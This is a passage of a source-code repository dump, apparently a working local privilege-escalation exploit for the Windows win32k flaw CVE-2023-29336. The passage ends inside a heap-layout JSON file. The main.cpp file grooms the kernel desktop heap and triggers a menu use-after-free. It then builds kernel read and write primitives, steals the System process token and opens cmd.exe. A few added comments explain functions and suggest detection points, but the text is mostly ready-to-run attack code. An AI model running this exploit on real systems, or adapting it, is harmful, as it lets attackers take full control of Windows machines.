dwmProcessId; 663 | } 664 | 665 | 
numberOfLFHAllocations += 1; 666 | 667 | // if (prevDwmProcessId != dwmProcessId) { 668 | // wprintf(L"[+][attempt][%d] reset number of allocations to default value because dwm crashed\n", iAttempt); 669 | // numberOfLFHAllocations = defaultNumberOfLFHAllocations; 670 | // } 671 | 672 | iAttempt++; 673 | } 674 | 675 | return bExploitOk; 676 | }; 677 | 678 | 679 | int 680 | __cdecl 681 | wmain( 682 | int argc, 683 | __in_ecount(argc) wchar_t* argv[]) 684 | { 685 | 686 | INIT(); 687 | 688 | UINT32 return_code = 0; 689 | 690 | wprintf(L"[?][main] PID=%x\n", GetCurrentProcessId()); 691 | wprintf(L"[?][main] TID=%x\n", GetCurrentThreadId()); 692 | 693 | exploit(); 694 | } -------------------------------------------------------------------------------- /cve-2023-29336/main.cpp: -------------------------------------------------------------------------------- 1 | #ifndef UNICODE 2 | #define UNICODE 3 | #endif 4 | 5 | #include 6 | #include 7 | #include 8 | 9 | #define WM_NCUAHDRAWCAPTION 0x00AE 10 | 11 | #define CMIALIGN(x,n) (size_t)((~(n-1))&((x)+(n-1))) 12 | #define SHIFT(x, n) ((PBYTE)(x) + n) 13 | 14 | /** 15 | * Removed 16 | */ 17 | 18 | typedef PTHRDESKHEAD(NTAPI *ty_pfnHMValidateHandle)(PVOID h, int type); 19 | 20 | ty_pfnHMValidateHandle find_HMValidateHandle() { 21 | HMODULE hUser32 = LoadLibrary(L"User32.dll"); 22 | if (NULL == hUser32) { 23 | wprintf(L"user32 not found\n"); 24 | return NULL; 25 | } 26 | PBYTE pbIsMenu = (PBYTE)GetProcAddress(hUser32, "IsMenu"); 27 | if (NULL == pbIsMenu) { 28 | wprintf(L"IsMenu() not found\n"); 29 | return NULL; 30 | } 31 | 32 | ty_pfnHMValidateHandle pfnHMValidateHandle = NULL; 33 | for(PBYTE i = pbIsMenu; i < (pbIsMenu + 0x1000); i++) { 34 | if (*i == 0xe8) { 35 | pfnHMValidateHandle = (ty_pfnHMValidateHandle)(i + 5 + (int)(*(DWORD*)(i + 1))); 36 | break; 37 | } 38 | } 39 | 40 | return pfnHMValidateHandle; 41 | }; 42 | 43 | /** 44 | * 45 | * Global Vars 46 | */ 47 | 48 | const UINT g_wID = 0xF010; 49 | const SIZE_T g_szWindow 
= 0x168; 50 | const SIZE_T g_szFiller = 0x248; 51 | const SIZE_T g_szCls = 0x1a0; 52 | 53 | const wchar_t g_fmt[] = L"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@%04d"; 54 | 55 | const SIZE_T g_cntWindowArrFill = 0x150; 56 | const SIZE_T g_cntMenuArrFill = 0x250; 57 | 58 | HWND g_hWindowArrFill[g_cntWindowArrFill] = {NULL}; 59 | HMENU g_hMenuArrFill[g_cntMenuArrFill] = {NULL}; 60 | PVOID g_kpPopupMenu_A = NULL; 61 | HMENU g_hPopupMenu_A = NULL; 62 | HMENU g_hMenu_Top = NULL; 63 | 64 | ty_pfnHMValidateHandle g_pfnHMValidateHandle = nullptr; 65 | ExploitState g_exploitState; 66 | BYTE g_spwndParent[0x200] = {0}; 67 | BYTE g_spmenu[0x100] = {0}; 68 | BYTE g_cls[0x1000] = {0}; 69 | 70 | int system() 71 | { 72 | SECURITY_ATTRIBUTES sa; 73 | HANDLE hRead, hWrite; 74 | byte buf[40960] = { 0 }; 75 | STARTUPINFOW si; 76 | PROCESS_INFORMATION pi; 77 | DWORD bytesRead; 78 | RtlSecureZeroMemory(&si, sizeof(si)); 79 | RtlSecureZeroMemory(&pi, sizeof(pi)); 80 | RtlSecureZeroMemory(&sa, sizeof(sa)); 81 | int br = 0; 82 | sa.nLength = sizeof(SECURITY_ATTRIBUTES); 83 | sa.lpSecurityDescriptor = NULL; 84 | sa.bInheritHandle = TRUE; 85 | if (!CreatePipe(&hRead, &hWrite, &sa, 0)) 86 | { 87 | printf("[!][system] CreatePipe(): Failed with %llx\n", GetLastError()); 88 | return -3; 89 | } 90 | 91 | si.cb = sizeof(STARTUPINFO); 92 | GetStartupInfoW(&si); 93 | si.hStdError = hWrite; 94 | si.hStdOutput = hWrite; 95 | si.lpDesktop = L"WinSta0\\Default"; 96 | wchar_t cmd[4096] = { L"cmd.exe" }; 97 | 98 | if (!CreateProcessW(NULL, cmd, NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi)) 99 | { 100 | CloseHandle(hWrite); 101 | CloseHandle(hRead); 102 | printf("[!][system] CreateProcessW(): Failed with %llx\n", GetLastError()); 103 | return -2; 104 | } 105 | CloseHandle(hWrite); 106 | 107 | } 108 | 109 | PVOID Read64(PVOID address) { 110 | MENUBARINFO mbi = { 0 }; 111 | mbi.cbSize = sizeof(MENUBARINFO); 112 | ptr_My_tagMENU spmenu = (ptr_My_tagMENU)g_spmenu; 
113 | 114 | spmenu->cItems = 1; 115 | spmenu->cAllocated = 1; 116 | spmenu->cxMenu = 1; 117 | spmenu->cyMenu = 1; 118 | spmenu->rgItems = SHIFT(address, -0x40); // sizeof tagMenuItem for tested version of OS Windows is 0x90 119 | // formulas inside win32kful!xxxGetMenuBarInfo are folowing 120 | // mov ecx, dword ptr [r8+rdx*8-50h] 121 | // add ecx, dword ptr [r8+rdx*8-48h] 122 | // where r8 is our address 123 | // and rdx*8 it is total offset from begin of rgItems to requested menu item 124 | // that means the low dword part will be read from 0x40 and high part from 0x48 125 | 126 | GetMenuBarInfo(g_exploitState.hRightGuard, OBJID_MENU, 1, &mbi); 127 | 128 | return PVOID((unsigned int)mbi.rcBar.left + ((ULONGLONG)mbi.rcBar.top << 32)); 129 | }; 130 | 131 | /* Write64(address, value, fStatus): attempts one pointer-sized write through SetClassLongPtr. It fills the user-mode buffer g_cls as a tagCLS look-alike (cbclsExtra = 0xFFFFFFFF, pclsBase = g_cls, pclsClone = address - 0xA0), then moves pclsClone back 8 bytes per step, adding 8 to o, while Read64(pclsClone) is non-zero and the 8-step budget lasts. With budget left it stores &g_cls[0] at class index 0x248 of hwndm, calls SetClassLongPtr(hRightGuard, o, value), and puts the saved 0x248 value back. Returns the previous value reported by the hRightGuard call with fStatus = true; returns NULL with fStatus = false when n reaches 0. The 0xA0 and 0x248 constants are fixed in the code; presumably they match only the Windows build the author tested - confirm before carrying this analysis over to another build. */ PVOID Write64(PVOID address, ULONG64 value, bool& fStatus) { 132 | ptr_My_tagCLS pcls = (ptr_My_tagCLS)g_cls; 133 | 134 | fStatus = false; 135 | 136 | pcls->cbclsExtra = 0xFFFFFFFF; 137 | pcls->pclsBase = (PVOID)&g_cls[0]; 138 | pcls->pclsClone = SHIFT(address, -0xA0); 139 | 140 | int n = 8; /* step budget for the search loop below */ 141 | int o = 0; /* bytes stepped back so far; later passed to SetClassLongPtr as the index */ 142 | PVOID pnext = Read64(pcls->pclsClone); 143 | while(pnext != 0 && n > 0 ) { 144 | o += 8; 145 | pcls->pclsClone = SHIFT(pcls->pclsClone, -8); 146 | pnext = Read64(pcls->pclsClone); 147 | n--; 148 | } 149 | 150 | if (n == 0){ 151 | fStatus = false; 152 | return NULL; 153 | } 154 | 155 | ULONG_PTR origcls = SetClassLongPtr(g_exploitState.hwndm, 0x248, (LONG_PTR)&g_cls[0]); 156 | ULONG_PTR prev = SetClassLongPtr(g_exploitState.hRightGuard, o, value); 157 | SetClassLongPtr(g_exploitState.hwndm, 0x248, origcls); 158 | 159 | fStatus = true; 160 | return (PVOID)prev; 161 | } 162 | 163 | void prepareHeap() { 164 | /** 165 | * We would like to build some "fence" in heap which will consist of 166 | * tagCLS. Each free tagCLS is a seat for allocated target tagMENU. 
167 | * 168 | * (folowing ASCII depict desired memory layout) 169 | * |------|-------------------------|------| 170 | * |tagCLS|seat for tagMENU (victim)|tagCLS| 171 | * |------|-------------------------|------| 172 | * 0 1 2 173 | * number of tagCLS deduced from practice 174 | * 175 | * odd indices of tagCLS is the seat 176 | * even indices of tagCLS is the fence 177 | * 178 | * order is important becuse we dont want to triger coalesce process in RtlpFree 179 | * 180 | * size of tagCLS with cbClsExtra == 0 is 0xA0 bytes. Size of tagMENU is 0x98 but it will be aligned by RtlpAllocateHeap 181 | * to 16 bound. That means tagMENU allocation size is 0xA0 bytes. 182 | * 183 | */ 184 | const wchar_t g_fmt[] = L"@%d"; 185 | for (int i = 0 ; i < 32; i++) { 186 | WCHAR szTemp[0x100] = { 0 }; 187 | wsprintf(szTemp, g_fmt, i); 188 | 189 | WNDCLASSEX wc = { 0 }; 190 | wc.cbClsExtra = 0x0; 191 | wc.lpszClassName = szTemp; 192 | wc.cbSize = sizeof(WNDCLASSEXA); 193 | wc.lpfnWndProc = DefWindowProcW; 194 | wc.lpszMenuName = NULL; 195 | wc.hInstance = GetModuleHandleA(NULL); 196 | 197 | RegisterClassExW(&wc); 198 | } 199 | 200 | for (int i = 0 ; i < 32; i++) { 201 | WCHAR szTemp[0x100] = { 0 }; 202 | wsprintf(szTemp, g_fmt, i); 203 | if (i % 2) 204 | UnregisterClassW(szTemp, GetModuleHandleA(NULL)); 205 | } 206 | } 207 | 208 | void reallocMenu() { 209 | for (int i = 0; i < 32; i++) { 210 | WCHAR szTemp[0x100] = { 0 }; 211 | wsprintf(szTemp, g_fmt, i); 212 | 213 | /** 214 | * What strings are we going to generate here ? 
215 | * AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@0000 (wnd => 0x303030) 216 | * AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@0001 (wnd => 0x313030) 217 | * AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@0011 (wnd => 0x313130) 218 | * AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@0012 (wnd => 0x313230) 219 | * AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@0002 (wnd => 0x323030) 220 | * AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@0022 (wnd => 0x323230) 221 | * AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@0003 (wnd => 0x333030) 222 | * ... 223 | * AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@0015 (wnd => 0x353130) 224 | * ... 225 | * AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@0031 (wnd => 0x313330) 226 | * AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@0032 (wnd => 0x323330) 227 | */ 228 | 229 | WNDCLASSEX wc = { 0 }; 230 | /** 231 | * We increases total size of tagCLS to move corresponded allocation size to another next alignment section. 232 | * It prevents occuping of prepared seats. We left them for CLSNAME. 233 | * */ 234 | wc.cbClsExtra = 0x30; 235 | /** 236 | * We replaces victim tagMENU with tagCLS.lpszClassName. 
237 | * szTemp has size of 0x98 (75 wchars + null term == 76 wchars, 238 | * 76 wchars * 2 == 0x98 bytes which will be alligned to 0xA0) 239 | */ 240 | wc.lpszClassName = szTemp; 241 | wc.cbSize = sizeof(WNDCLASSEXA); 242 | wc.lpfnWndProc = DefWindowProcW; 243 | wc.lpszMenuName = NULL; 244 | wc.hInstance = GetModuleHandleA(NULL); 245 | 246 | RegisterClassExW(&wc); 247 | } 248 | } 249 | 250 | /* exploit(): uses the Read64/Write64 helpers to replace the token pointer of the current process. Steps visible in the body: store &g_spmenu[0] at class index 0x270 of hwndm; read the RightGuard window's thread-info pointer at kptagCls + 0x260; follow it to ETHREAD and then to EPROCESS (+0x220); walk the process list from EPROCESS + 0x2f0 through the +0x08 link until the entry whose PID field (link - 0x08) equals 4; read that entry's token field (link + 0x68) and Write64 it to EPROCESS + 0x358; finally store NULL at index 0x270 again. Returns -1 if the first SetClassLongPtr fails, 1 if any read or the write fails, 0 otherwise - including when the do/while condition (p != eprocess) ends the walk without a PID 4 match, in which case no token was written. Every offset is hard-coded; presumably valid only for the Windows build the author tested - confirm. NOTE(review), for defenders: the end state is a user process holding the System process token without any logon or impersonation call, and wmain() starts cmd.exe right after this returns, so token-change and child-process telemetry look like the places to detect it - confirm against your own sensors. */ int exploit() { 251 | // we use OOB write to overwrite RightGuard.spmenu field 252 | // +0x1A0 sizeof targetTagCLS 253 | // +0xC0 offset to spmenu field 254 | SetLastError(0); 255 | LONG_PTR result = SetClassLongPtr(g_exploitState.hwndm, 0x270, (LONG_PTR)&g_spmenu[0]); 256 | if (result == NULL && GetLastError() != ERROR_SUCCESS) { 257 | wprintf(L"[~][exploit] SetClassLongPtr() Failed with %d", GetLastError()); 258 | return -1; 259 | } 260 | // we read RightGuard window ThreadInfo 261 | // +0x250 sizeof targetTagCls 262 | // +0x10 offset to TI field 263 | PVOID p = Read64(SHIFT(g_exploitState.kptagCls, 0x260)); 264 | wprintf(L"[+][exploit] -> RGW.ti=%llx\n", p); 265 | 266 | // ETHREAD 267 | p = Read64(p); 268 | if (!p) { 269 | wprintf(L"[~][exploit] Reading ETHREAD was failed\n"); 270 | return 1; 271 | } 272 | wprintf(L"[+][exploit] -> ETHREAD=%llx\n", p); 273 | PVOID eprocess = Read64(SHIFT(p, 0x220)); 274 | if (!eprocess) { 275 | wprintf(L"[~][exploit] Reading EPROCESS was failed\n"); 276 | return 1; 277 | } 278 | wprintf(L"[+][exploit] -> EPROCESS=%llx\n", eprocess); 279 | p = Read64(SHIFT(eprocess, 0x2f0)); 280 | if (!p) { 281 | wprintf(L"[~][exploit] Reading of EPROCESS.ActiveProcessLinks failed\n"); 282 | return 1; 283 | } 284 | do { 285 | p = Read64(SHIFT(p, 0x08)); 286 | if (!p) { 287 | wprintf(L"[~][exploit] Reading of EPROCESS.ActiveProcessLinks.BLink failed\n"); 288 | return 1; 289 | } 290 | ULONG64 pid = (ULONG64)Read64(SHIFT(p, -0x08)); 291 | if (!pid) { 292 | wprintf(L"[~][exploit] Reading of EPROCESS.Pid failed\n"); 293 | return 1; 294 | } 295 | if (pid == 4) { 
296 | PVOID pSystemToken = Read64(SHIFT(p, 0x68)); 297 | if (!pSystemToken) { 298 | wprintf(L"[~][exploit] Reading of EPROCESS.pSystemToken failed\n"); 299 | return 1; 300 | } 301 | printf("[+][exploit] -> pSystemToken=%llx \n", pSystemToken); 302 | 303 | bool fSetTokenStatus = false; 304 | Write64(SHIFT(eprocess, 0x358), (ULONG64)pSystemToken, fSetTokenStatus); 305 | if (!fSetTokenStatus) { 306 | printf("[+][exploit] -> Write64(): Failed \n", pSystemToken); 307 | return 1; 308 | } 309 | 310 | break; 311 | } 312 | } while (p != eprocess); 313 | 314 | // recover back spmenu 315 | result = SetClassLongPtr(g_exploitState.hwndm, 0x270, (LONG_PTR)NULL); 316 | 317 | return 0; 318 | }; 319 | 320 | /* initfake(base, menu, target): writes three chained structures into the buffer at base. Layout: a My_tagTHREADINFO at base, a My_tagMENUSTATE directly after it, a My_tagPOPUPMENU directly after that. Links set: threadInfo.pMenuState -> menuState; menuState.pGlobalPopupMenu -> popupMenu; popupMenu.spmenu = menu; popupMenu.spwndPopupMenu = target. base must be writable and large enough for the three structures together; nothing here checks that. The My_tag* types are declared outside this chunk, so their field offsets cannot be confirmed from here. */ void initfake(PVOID base, PVOID menu, PVOID target) { 321 | PVOID menuState = SHIFT(base, sizeof(My_tagTHREADINFO)); 322 | PVOID popupMenu = SHIFT(menuState, sizeof(My_tagMENUSTATE)); 323 | 324 | ptr_My_tagTHREADINFO fake_threadInfo = (ptr_My_tagTHREADINFO)base; 325 | fake_threadInfo->pMenuState = menuState; 326 | 327 | ptr_My_tagMENUSTATE fake_menuState = (ptr_My_tagMENUSTATE)menuState; 328 | 329 | fake_menuState->fFlags = 0x04; // fInsideMenuLoop value for condition in win32kfull!MNGetPopupFromMenu 330 | fake_menuState->pGlobalPopupMenu = popupMenu; 331 | fake_menuState->field_60 = 0; // fast exit from win32kfull!MNAnimate 332 | 333 | ptr_My_tagPOPUPMENU fake_popupmenu = (ptr_My_tagPOPUPMENU)popupMenu; 334 | fake_popupmenu->spmenu = menu; 335 | fake_popupmenu->spwndPopupMenu = target; 336 | } 337 | 338 | void setupfake(HMENU hMenu) { 339 | 340 | PVOID menu = g_pfnHMValidateHandle(hMenu, 2)->pSelf; 341 | 342 | wprintf(L"[?][setupfake] kpmenu=%llx\n", menu); 343 | 344 | PVOID umptr = VirtualAlloc((PVOID)0x300000, 0x100000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); 345 | memset(umptr, 0x41, 0x100000); 346 | 347 | /** 348 | * Here we craft our fake structures 349 | */ 350 | PVOID fakebase = (PVOID)0x303030; 351 | for (int i = 0; i < 32; i++){ 352 | // here we allocate 
block for fake structure for each tagCLS reallocation 353 | PVOID umti = VirtualAlloc( 354 | NULL, 355 | 0x1000, 356 | MEM_COMMIT | MEM_RESERVE, 357 | PAGE_EXECUTE_READWRITE 358 | ); 359 | // fill data at destination addresses (tagCLS:NAME + 0x48) 360 | PVOID base = SHIFT(fakebase, ((i % 10) * 0x10000) + (i / 9) * 0x100); 361 | 362 | wprintf(L"[?][setupfake] base=%llx\n", (ULONGLONG)base); 363 | 364 | ptr_My_tagWND fake_tagWND = (ptr_My_tagWND)base; 365 | fake_tagWND->pti = umti; 366 | 367 | //-0x120 field offset 368 | // 0x60 tagcls offset 369 | // but we moved it on 3 bytes 370 | // to change the most significant 371 | // byte in cbClsExtra field 372 | initfake( 373 | umti, 374 | menu, 375 | SHIFT(SHIFT(g_exploitState.kptagCls, 0x63), -0x120) 376 | ); 377 | } 378 | }; 379 | 380 | void initprimitive() { 381 | const int allocationsCount = 0x100; 382 | 383 | HWND twindows[allocationsCount] = {0}; 384 | 385 | WNDCLASS wc = { 0 }; 386 | wc.lpfnWndProc = DefWindowProc; 387 | wc.lpszClassName = L"WindowClass#1"; 388 | wc.cbWndExtra = 0xe0; 389 | RegisterClass(&wc); 390 | 391 | for (int i = 0; i < allocationsCount; i++) { 392 | twindows[i] = CreateWindow(wc.lpszClassName, NULL, NULL, 0, 0, 0, 0, NULL, NULL, NULL, NULL); 393 | } 394 | 395 | HWND hMiddle = NULL; 396 | for (int i = 1; i < allocationsCount - 1; i++) { 397 | HWND pj = twindows[i - 1]; 398 | HWND j = twindows[i]; 399 | HWND nj = twindows[i + 1]; 400 | 401 | PTHRDESKHEAD kptrpj = g_pfnHMValidateHandle(pj, 1); 402 | PTHRDESKHEAD kptrj = g_pfnHMValidateHandle(j, 1); 403 | PTHRDESKHEAD kptrnj = g_pfnHMValidateHandle(nj, 1); 404 | 405 | ULONGLONG ndiff = abs((LONGLONG)kptrj->pSelf - (LONGLONG)kptrnj->pSelf); 406 | ULONGLONG pdiff = abs((LONGLONG)kptrpj->pSelf - (LONGLONG)kptrj->pSelf); 407 | 408 | wprintf(L"[?][initprimitive] j=%llx nj=%llx pj=%llx ndiff=%llx pdiff=%llx \n", (ULONGLONG)kptrj->pSelf, (ULONGLONG)kptrnj->pSelf, (ULONGLONG)kptrpj->pSelf, ndiff, pdiff); 409 | 410 | if (pdiff == 0x250 && ndiff == 0x250) 
{ 411 | hMiddle = j; 412 | 413 | // save primitive setup 414 | g_exploitState.hLeftGuard = pj; 415 | g_exploitState.hRightGuard = nj; 416 | g_exploitState.kptagCls = kptrj->pSelf; 417 | break; 418 | } 419 | } 420 | 421 | if (hMiddle == NULL) 422 | return; 423 | 424 | DestroyWindow(hMiddle); 425 | 426 | WNDCLASSEXW targetWC = { 0 }; 427 | targetWC.lpfnWndProc = DefWindowProc; 428 | targetWC.lpszClassName = L"WindowClass#2"; 429 | targetWC.cbClsExtra = 0x1a0; 430 | targetWC.cbSize = sizeof(WNDCLASSEXA); 431 | targetWC.lpfnWndProc = DefWindowProcW; 432 | targetWC.hInstance = GetModuleHandleA(NULL); 433 | 434 | RegisterClassExW(&targetWC); 435 | 436 | for (int i = 0; i < allocationsCount; i++) { 437 | if (twindows[i] == g_exploitState.hLeftGuard || twindows[i] == g_exploitState.hRightGuard) 438 | continue; 439 | 440 | DestroyWindow(twindows[i]); 441 | } 442 | 443 | // set constants in extra data array of LeftGuard Window 444 | 445 | // first sets field_37 of tagWND inside extra data array of LeftGuard Window 446 | // it is checked in win32kfull!xxxRedrawWindow 447 | SetLastError(0); 448 | LONG_PTR result = SetWindowLongPtr(g_exploitState.hLeftGuard, 0x62, 0x1111111122222210); 449 | if (!result && GetLastError() != ERROR_SUCCESS) { 450 | wprintf(L"[!][initprimitive] SetWindowLongPtr(0x5a): Failed with %d\n", GetLastError()); 451 | } 452 | 453 | // second sets field_42 of tagWND inside extra data array of LeftGuard Window 454 | // it is checked in win32kfull!xxxRedrawWindow 455 | SetLastError(0); 456 | result = SetWindowLongPtr(g_exploitState.hLeftGuard, 0x6d, 0x29d); 457 | if (!result && GetLastError() != ERROR_SUCCESS) { 458 | wprintf(L"[!][initprimitive] SetWindowLongPtr(0x6d): Failed with %d\n", GetLastError()); 459 | } 460 | 461 | // third sets field_32 of tagWND inside extra data array of LeftGuard Window 462 | // it is checked in win32kfull!xxxRedrawWindow 463 | SetLastError(0); 464 | result = SetWindowLong(g_exploitState.hLeftGuard, 0x5d, 0x8); 465 | if (!result 
&& GetLastError() != ERROR_SUCCESS) { 466 | wprintf(L"[!][initprimitive] SetWindowLongPtr(0x6d): Failed with %d\n", GetLastError()); 467 | } 468 | 469 | // fourth sets spwndParent of tagWND inside extra data array of LeftGuard Window 470 | // it is checked in win32kfull!xxxRedrawWindow 471 | // it prevents from crash inside InternalInvalidate2 472 | SetLastError(0); 473 | result = SetWindowLongPtr(g_exploitState.hLeftGuard, 0x83, (LONG_PTR)&g_spwndParent[0]); 474 | if (!result && GetLastError() != ERROR_SUCCESS) { 475 | wprintf(L"[!][initprimitive] SetWindowLongPtr(0x6d): Failed with %d\n", GetLastError()); 476 | } 477 | 478 | // we need additional window bind to target tagCls for OOB write 479 | // SetClassLongPtr() requires the HWND 480 | g_exploitState.hwndm = CreateWindow(targetWC.lpszClassName, NULL, NULL, 0, 0, 0, 0, NULL, NULL, NULL, NULL); 481 | } 482 | 483 | LRESULT CALLBACK wndproc(HWND hWnd, UINT msg, WPARAM wParam, LPARAM lParam) 484 | { 485 | switch(msg) { 486 | case WM_NCUAHDRAWCAPTION: { 487 | 488 | wprintf(L"[?] wndproc: msg=WM_NCUAHDRAWCAPTION wParam=%x lParam=%x\n", wParam, lParam); 489 | 490 | for (int i = GetMenuItemCount(g_hMenu_Top) - 1; i >= 0; i--) { 491 | RemoveMenu(g_hMenu_Top, i, MF_BYPOSITION); 492 | } 493 | wprintf(L"[+] 5. Destroy Menu\n"); 494 | system("pause"); 495 | 496 | DestroyMenu(g_hPopupMenu_A); // Here MenuA will be freed 497 | wprintf(L"[+] 6. Destroyed\n"); 498 | 499 | system("pause"); 500 | reallocMenu(); 501 | wprintf(L"[+] 6. 
Reallocated \n"); 502 | system("pause"); 503 | 504 | break; 505 | } 506 | } 507 | 508 | return DefWindowProc(hWnd, msg, wParam, lParam); 509 | } 510 | 511 | int 512 | __cdecl 513 | wmain( 514 | int argc, 515 | __in_ecount(argc) wchar_t* argv[]) 516 | { 517 | wprintf(L"[?][main] PID=%x\n", GetCurrentProcessId()); 518 | wprintf(L"[?][main] TID=%x\n", GetCurrentThreadId()); 519 | system("pause"); 520 | 521 | g_pfnHMValidateHandle = find_HMValidateHandle(); 522 | 523 | wprintf(L"[+][main] init RW primitive: STARTED\n"); 524 | ZeroMemory(&g_exploitState, sizeof(ExploitState)); 525 | initprimitive(); 526 | if (g_exploitState.kptagCls == NULL) { 527 | wprintf(L"[!][main] Failed to make primitive :-(\n"); 528 | return -1; 529 | } 530 | 531 | wprintf(L"[+][main] init RW primitive: OK\n"); 532 | wprintf(L"[+][main] -> LGW=%llx\n", g_exploitState.hLeftGuard); 533 | wprintf(L"[+][main] -> RGW=%llx\n", g_exploitState.hRightGuard); 534 | wprintf(L"[+][main] -> kptagCls=%llx\n", g_exploitState.kptagCls); 535 | 536 | WNDCLASS wc = { 0 }; 537 | wc.lpfnWndProc = wndproc; 538 | wc.lpszClassName = L"NormalClass"; 539 | RegisterClass(&wc); 540 | 541 | HWND hwnd = CreateWindow(wc.lpszClassName, NULL, WS_OVERLAPPEDWINDOW, CW_USEDEFAULT, CW_USEDEFAULT, 300, 100, NULL, NULL, NULL, NULL); 542 | if (NULL == hwnd) { 543 | wprintf(L"[~][main] CreateWindowExW(): Failed with %d\n", GetLastError()); 544 | return -2; 545 | } 546 | 547 | HMENU hSystemMenu = GetSystemMenu(hwnd, FALSE); 548 | if (NULL == DeleteMenu(hSystemMenu, g_wID, MF_BYCOMMAND)) 549 | { 550 | wprintf(L"[~][main] DeleteMenu(): Failed with %d\n", GetLastError()); 551 | return -2; 552 | } 553 | 554 | g_hMenu_Top = CreateMenu(); 555 | if (NULL == g_hMenu_Top) { 556 | wprintf(L"[~][main] CreateMenu(): Failed with %d\n", GetLastError()); 557 | return -3; 558 | } 559 | 560 | wprintf(L"[+][main] prepare win32k desktop heap: STARTED\n"); 561 | system("pause"); 562 | 563 | prepareHeap(); 564 | 565 | wprintf(L"[+][main] prepare win32k 
desktop heap: OK\n"); 566 | system("pause"); 567 | 568 | g_hPopupMenu_A = CreatePopupMenu(); 569 | if (NULL == g_hPopupMenu_A) { 570 | wprintf(L"[~][main] CreatePopupMenu(A): Failed with %d\n", GetLastError()); 571 | return -4; 572 | } 573 | 574 | wprintf(L"[+][main] setupfake structures: STARTED\n"); 575 | setupfake(g_hPopupMenu_A); 576 | wprintf(L"[+][main] setupfake structures: OK\n"); 577 | 578 | /* 579 | |---------| 580 | | SysMenu | <---- It gives us ability to callback inside xxxRedrawTitle 581 | |---------| 582 | | 583 | | 584 | ------>|---------| 585 | | Top | 586 | |---------| 587 | | 588 | | |---------| 589 | --->| MenuA | <----- UAF Target 590 | |---------| 591 | | 592 | | 593 | ------>|--------------| 594 | | | MenuB_Item1 | 595 | | |--------------| 596 | | |--------------| 597 | ------>| MenuB_Item2 | <---- Has system wID 598 | |--------------| 599 | 600 | */ 601 | 602 | AppendMenu(g_hPopupMenu_A, MF_STRING, (UINT_PTR)0x901, L"MenuB_Item1"); 603 | AppendMenu(g_hPopupMenu_A, MF_STRING, (UINT_PTR)g_wID, L"MenuB_Item2"); 604 | 605 | AppendMenu(g_hMenu_Top, MF_POPUP, (UINT_PTR)g_hPopupMenu_A, L"MenuA"); 606 | AppendMenu(hSystemMenu, MF_POPUP, (UINT_PTR)g_hMenu_Top, L"Top"); 607 | 608 | ShowWindow(hwnd, SW_SHOW); 609 | UpdateWindow(hwnd); 610 | 611 | wprintf(L"[?][main] hwnd=%llx\n", hwnd); 612 | wprintf(L"[?][main] hmenu=%llx\n", g_hMenu_Top); 613 | wprintf(L"[?][main] hsysmenu=%llx\n", hSystemMenu); 614 | wprintf(L"[?][main] hpopupmenu(A)=%llx\n", g_hPopupMenu_A); 615 | 616 | wprintf(L"[+][main] --> win32kfull!xxxEnableMenuItem() <-- \n"); 617 | system("pause"); 618 | 619 | EnableMenuItem(hSystemMenu, g_wID, MF_DISABLED); 620 | 621 | exploit(); 622 | system(); 623 | 624 | MSG msg = { 0 }; 625 | 626 | while (GetMessage(&msg, NULL, 0, 0)) 627 | { 628 | TranslateMessage(&msg); 629 | DispatchMessage(&msg); 630 | } 631 | } -------------------------------------------------------------------------------- 
/cve-2023-29336/visualisation/src/prepare-heap-done.memorylayout.json: -------------------------------------------------------------------------------- 1 | {"HeapFirstEntry":"0xffffc8d5006006f0","HeapLastValidEntry":"0xffffc8d501a00000","Granularity":16,"Allocated":{"Objects":[{"Block":"0xffffc8d500600810","Type":"WINDOW","Handle":"0x10010","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d50061e5c0","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d500600a50","Type":"WINDOW","Handle":"0x10012","Size":24,"UnusedBytes":20},{"Block":"0xffffc8d500600ca0","Type":"WINDOW","Handle":"0x10014","Size":26,"UnusedBytes":8},{"Block":"0xffffc8d50061f510","Type":"WINDOW","Handle":"0x40018","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d5006011d0","Type":"WINDOW","Handle":"0x1001c","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d5006013c0","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d500601730","Type":"WINDOW","Handle":"0x2001e","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d5006018e0","Type":"WINDOW","Handle":"0x10020","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d50061eaf0","Type":"WINDOW","Handle":"0x20026","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d50061ed50","Type":"WINDOW","Handle":"0x20028","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d50061f390","Type":"WINDOW","Handle":"0x20038","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006221f0","Type":"WINDOW","Handle":"0x4003a","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061e850","Type":"WINDOW","Handle":"0x2003c","Si